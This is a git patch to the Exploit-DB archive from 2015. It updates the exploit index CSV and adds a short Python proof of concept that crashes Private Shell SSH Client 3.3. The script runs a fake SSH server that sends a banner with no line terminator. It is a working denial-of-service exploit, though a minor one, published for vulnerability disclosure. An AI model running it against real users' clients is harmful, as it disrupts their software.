From 75bd2aed32e251b25788bcf3ab114625f9ea2793 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 1 Jun 2015 05:01:34 +0000 Subject: [PATCH] DB: 2015-06-01 1 new exploits --- files.csv | 3 ++- platforms/windows/dos/37149.py | 25 +++++++++++++++++++++++++ 2 files changed, 27 insertions(+), 1 deletion(-) create mode 100755 platforms/windows/dos/37149.py diff --git a/files.csv b/files.csv index b44d1a8a0..1978e9376 100755 --- a/files.csv +++ b/files.csv @@ -21241,7 +21241,7 @@ id,file,description,date,author,platform,type,port 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0 -24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0 +24044,platforms/php/webapps/24044.txt,"phpLiteAdmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection Vulnerability",2004-04-23,JQ,php,webapps,0 @@ -33530,5 +33530,6 @@ id,file,description,date,author,platform,type,port 37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 'ajaxhelper.php' Cross Site Scripting Vulnerability",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 +37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 diff --git a/platforms/windows/dos/37149.py b/platforms/windows/dos/37149.py new file mode 100755 index 000000000..032f855d9 --- /dev/null +++ b/platforms/windows/dos/37149.py @@ -0,0 +1,25 @@ +''' +# Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability +# Date: 27-5-2015 +# Vendor homepage: www.privateshell.com +# Software Link: http://www.privateshell.com/files/pshell.exe +# Version: 3.3 +# Author: 3unnym00n + +# Details: +# -------- +# when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash + +# Tested On: win7 +# operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" root@127.0.0.1 + +''' + + + +import socket +soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +soc.bind(('127.0.0.1', 22)) +soc.listen(1) +client, addr = soc.accept() +client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash